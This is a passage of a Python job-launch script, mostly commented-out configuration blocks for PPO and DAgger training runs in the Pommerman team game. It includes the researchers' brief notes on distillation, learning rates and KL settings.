# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".99", "lr": 0.0001,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# train_ppo_job(
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# train_ppo_job(
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0001,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# train_ppo_job(
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# ### These are trying to dagger train an agent in a TeamRandom game.
# train_dagger_job(
# {"num-processes": 8, "run-name": "loldag", "how-train": "dagger", "num-episodes-dagger": 50, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "loldag"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "loldag", "how-train": "dagger", "num-episodes-dagger": 15, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "loldag"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "loldag", "how-train": "dagger", "num-episodes-dagger": 50, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmall",
# }, "loldag"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "loldag", "how-train": "dagger", "num-episodes-dagger": 15, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmall",
# }, "loldag"
# )
# ### These are like the above but don't use the value loss.
# train_dagger_job(
# {"num-processes": 8, "run-name": "lolexuvl", "how-train": "dagger", "num-episodes-dagger": 25, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "lolexuvl"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "lolexuvl", "how-train": "dagger", "num-episodes-dagger": 15, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "lolexuvl"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "lolexuvl", "how-train": "dagger", "num-episodes-dagger": 25, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmall",
# }, "lolexuvl"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "lolexuvl", "how-train": "dagger", "num-episodes-dagger": 15, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmall",
# }, "lolexuvl"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "loldag", "how-train": "dagger", "num-episodes-dagger": 20, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.001, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "loldag"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "loldag", "how-train": "dagger", "num-episodes-dagger": 20, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.001, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "loldag"
# )
### These are ppo jobs where we "distill" the 1hot Simple Agent into the PPO Agent.
# train_ppo_job( # This job will have batch size of 800
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "num-steps": 200,
# "distill-expert": "SimpleAgent"
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 400
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2,
# "distill-expert": "SimpleAgent"
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 200
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 4,
# "distill-expert": "SimpleAgent"
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 300
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 4, "num-steps": 150,
# "distill-expert": "SimpleAgent"
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 150
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "num-steps": 150,
# "distill-expert": "SimpleAgent"
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 400
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 4, "num-steps": 200,
# "distill-expert": "SimpleAgent"
# }, "pmanDSSimp"
# )
### These are the same as above, but with a longer distill-epochs
# train_ppo_job( # This job will have batch size of 800
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "num-steps": 200,
# "distill-expert": "SimpleAgent", "distill-epochs": 5000,
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 400
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2,
# "distill-expert": "SimpleAgent", "distill-epochs": 5000,
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 200
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 4,
# "distill-expert": "SimpleAgent", "distill-epochs": 5000,
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 300
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 4, "num-steps": 150,
# "distill-expert": "SimpleAgent", "distill-epochs": 5000,
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 150
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "num-steps": 150,
# "distill-expert": "SimpleAgent", "distill-epochs": 5000,
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 400
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 4, "num-steps": 200,
# "distill-expert": "SimpleAgent", "distill-epochs": 5000,
# }, "pmanDSSimp"
# )
### These are meant to keep going on one of the earlier models that seemed to hit a wall wrt LR.
# train_dagger_job(
# {"num-processes": 8, "run-name": "cont", "how-train": "dagger", "num-episodes-dagger": 15, "log-interval": 25,
# "minibatch-size": 2000, "save-interval": 25, "lr": 0.001, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# "use-value-loss": "", "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-dagg-gma995.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb2000.ne15.prob0.5.nopt1.epoch290.steps232800.seed1.pt"
# }
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "cont", "how-train": "dagger", "num-episodes-dagger": 15, "log-interval": 25,
# "minibatch-size": 2000, "save-interval": 25, "lr": 0.0005, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# "use-value-loss": "", "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-dagg-gma995.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb2000.ne15.prob0.5.nopt1.epoch290.steps232800.seed1.pt"
# }
# )
### These are meant to see if we can distill the 1hot SImple Agent into the PPO while playing Team. These all have a bigger batch size.
### These did not work but did pose some questions. Namely, the 3e-4 learning rate ones
### seem to be learning something. We are goign to try increasing the KL factor a hell of a lot
### and seeing if that helps.
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".995", "lr": 0.001,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".995", "lr": 0.001,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.001,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.001,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
### These try to adjust for what we learned above with an attempt to bump up the KL.
###
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "b", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "b", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "b", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0005, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "b", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0005, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
### These are hte same as above (modulo the lr) but repeated now that we have the new team reward in place.
###
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "coop", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmancoop"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "coop", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmancoop"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "coop", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000,
# }, "pmancoop"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "coop", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000,
# }, "pmancoop"
# )
### These are again trying to initialize from a dagger trained agent.
###
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "initexuvl", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000, "use-gae": "",
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000, "use-gae": "",
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# ### These are like the above but additioanlyl distills from SimpleAgent
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "initexuvl", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000, "use-gae": "",
# "distill-expert": "SimpleAgent", "distill-epochs": 10000,
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000, "use-gae": "",
# "distill-expert": "SimpleAgent", "distill-epochs": 10000,
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
